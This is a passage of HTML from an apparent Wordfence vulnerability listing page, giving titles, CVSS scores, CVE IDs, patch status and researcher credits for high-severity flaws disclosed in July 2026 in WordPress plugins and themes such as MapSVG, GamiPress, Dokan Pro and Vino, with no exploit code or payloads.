<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms" target="_blank" rel="noopener">WPForms Pro</a> <span class="wfvr-software-slug">[wpforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b267f163-966a-43f7-8a7c-67d34c2c7e9d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a9b8f2d5-a2c5-4f90-ab1d-4e17f7a7996e" target="_blank" rel="noopener">WPify Woo &lt;= 5.4.16 &#8211; Authenticated (Shop Manager+) Privilege Escalation via Arbitrary Option Update via save_option REST Endpoint</a></h4>
<div class="cvss-score-badge">8.0</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.0 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12736" target="_blank" rel="noopener noreferrer">							CVE-2026-12736						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpify-woo" target="_blank" rel="noopener">WPify Woo – Withdrawal, CRN/VAT, QR payments, Heureka and more for WooCommerce</a> <span class="wfvr-software-slug">[wpify-woo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a9b8f2d5-a2c5-4f90-ab1d-4e17f7a7996e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58063939-5d44-4369-a0f6-c7f1b0271c44" target="_blank" rel="noopener">AWP Classifieds &lt;= 4.4.7 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59550" target="_blank" rel="noopener noreferrer">							CVE-2026-59550						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/another-wordpress-classifieds-plugin" target="_blank" rel="noopener">AWP Classifieds</a> <span class="wfvr-software-slug">[another-wordpress-classifieds-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thaer-assfour" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a9ec4eb223d84f01746308316732603e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a9ec4eb223d84f01746308316732603e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thaer-assfour" target="_blank" rel="noopener">Thaer Assfour</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58063939-5d44-4369-a0f6-c7f1b0271c44" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/819542fe-004e-4636-ad38-f11642d52ede" target="_blank" rel="noopener">Dokan Pro &lt;= 5.0.2 &#8211; Authenticated (Subscriber+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65493" target="_blank" rel="noopener noreferrer">							CVE-2026-65493						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-pro" target="_blank" rel="noopener">Dokan Pro</a> <span class="wfvr-software-slug">[dokan-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/expatch" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/791c547484c10e03a88616b631bb8a6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="791c547484c10e03a88616b631bb8a6a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/expatch" target="_blank" rel="noopener">Expatch</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/819542fe-004e-4636-ad38-f11642d52ede" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a6d636a6-108c-40c5-b7c9-e3dee6bcaa0b" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress &lt;= 7.9.7 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59538" target="_blank" rel="noopener noreferrer">							CVE-2026-59538						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ae8de8c9cbdc17ec01dd57c487e7cd37.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ae8de8c9cbdc17ec01dd57c487e7cd37"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener">qdtad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a6d636a6-108c-40c5-b7c9-e3dee6bcaa0b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62e223a5-768f-4743-99a5-2797fff7e976" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps &lt;= 8.14.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59527" target="_blank" rel="noopener noreferrer">							CVE-2026-59527						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg-lite-interactive-vector-maps" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps</a> <span class="wfvr-software-slug">[mapsvg-lite-interactive-vector-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62e223a5-768f-4743-99a5-2797fff7e976" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e4a2ba2-16e3-473e-a5fc-6a6437eae55e" target="_blank" rel="noopener">MapSVG &lt;= 8.14.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59526" target="_blank" rel="noopener noreferrer">							CVE-2026-59526						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg" target="_blank" rel="noopener">MapSVG</a> <span class="wfvr-software-slug">[mapsvg]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e4a2ba2-16e3-473e-a5fc-6a6437eae55e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13728336-42b8-4857-9753-c91b7cb028fa" target="_blank" rel="noopener">Participants Database &lt;= 2.7.8.3 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59525" target="_blank" rel="noopener noreferrer">							CVE-2026-59525						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/participants-database" target="_blank" rel="noopener">Participants Database</a> <span class="wfvr-software-slug">[participants-database]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/l4m" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b1c4c306fad16439d9178a0d349f0c40.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b1c4c306fad16439d9178a0d349f0c40"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/l4m" target="_blank" rel="noopener">L4m</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13728336-42b8-4857-9753-c91b7cb028fa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee7555a1-18dc-4b00-81f6-b26706cfb573" target="_blank" rel="noopener">Product Designer for WooCommerce WordPress | Lumise &lt;= 2.1.1 &#8211; Unauthenticated SQL Injection via &#8216;id&#8217; Parameter in Cart JSON Upload</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9713" target="_blank" rel="noopener noreferrer">							CVE-2026-9713						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lumise" target="_blank" rel="noopener">Product Designer for WooCommerce WordPress | Lumise</a> <span class="wfvr-software-slug">[lumise]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee7555a1-18dc-4b00-81f6-b26706cfb573" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e231c77b-01f8-408f-82ae-4efb6fcc4184" target="_blank" rel="noopener">Relevanssi Light &lt;= 1.2.2 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59533" target="_blank" rel="noopener noreferrer">							CVE-2026-59533						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/relevanssi-light" target="_blank" rel="noopener">Relevanssi Light</a> <span class="wfvr-software-slug">[relevanssi-light]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f005c4dc82929a63b828a2192c5e7c02.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f005c4dc82929a63b828a2192c5e7c02"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener">ParkHyunWoo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e231c77b-01f8-408f-82ae-4efb6fcc4184" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e7a86b-8c5d-46d1-a51e-1368c6a880fd" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress &lt;= 4.7.10 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59549" target="_blank" rel="noopener noreferrer">							CVE-2026-59549						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress</a> <span class="wfvr-software-slug">[buddypress-media]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zainul-anwar-adi-putra" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c3c30a52de4465cc659a66d464f7bb49.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c3c30a52de4465cc659a66d464f7bb49"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zainul-anwar-adi-putra" target="_blank" rel="noopener">Zainul Anwar Adi Putra</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e7a86b-8c5d-46d1-a51e-1368c6a880fd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c81eabe-93c2-4838-af35-ad1c0ba458af" target="_blank" rel="noopener">Tonda Core &lt;= 2.1.2 &#8211; Authenticated (Contributor+) Local File Inclusion</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65477" target="_blank" rel="noopener noreferrer">							CVE-2026-65477						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tonda-core" target="_blank" rel="noopener">Tonda Core</a> <span class="wfvr-software-slug">[tonda-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c81eabe-93c2-4838-af35-ad1c0ba458af" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13d07e9d-0e28-4d28-b1e9-168a83e98bf6" target="_blank" rel="noopener">Vino &lt;= 1.9 &#8211; Authenticated (Contributor+) Local File Inclusion</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65481" target="_blank" rel="noopener noreferrer">							CVE-2026-65481						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/vino" target="_blank" rel="noopener">Vino &#8211; A Refined Winery, Wine Bar and Vineyard WordPress Theme</a> <span class="wfvr-software-slug">[vino]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13d07e9d-0e28-4d28-b1e9-168a83e98bf6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca9eaf7-261b-42ab-a779-9e11dde5763b" target="_blank" rel="noopener">EventON Action User &lt;= 2.5.14 &#8211; Missing Authorization to Unauthenticated Privilege Escalation via evoau_save_capability AJAX Action</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10033" target="_blank" rel="noopener noreferrer">							CVE-2026-10033						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eventon-action-user" target="_blank" rel="noopener">EventON Action User</a> <span class="wfvr-software-slug">[eventon-action-user]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-szopa" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3d992d9e2b938fd987e3a29a99edccb4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3d992d9e2b938fd987e3a29a99edccb4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-szopa" target="_blank" rel="noopener">Vincent Szopa (bioflavonoid)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca9eaf7-261b-42ab-a779-9e11dde5763b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8865a30-ecff-439b-ab96-4dba018046ae" target="_blank" rel="noopener">3D Flipbook PDF Viewer &amp; Embedder &lt;= 1.4.2 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59552" target="_blank" rel="noopener noreferrer">							CVE-2026-59552						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
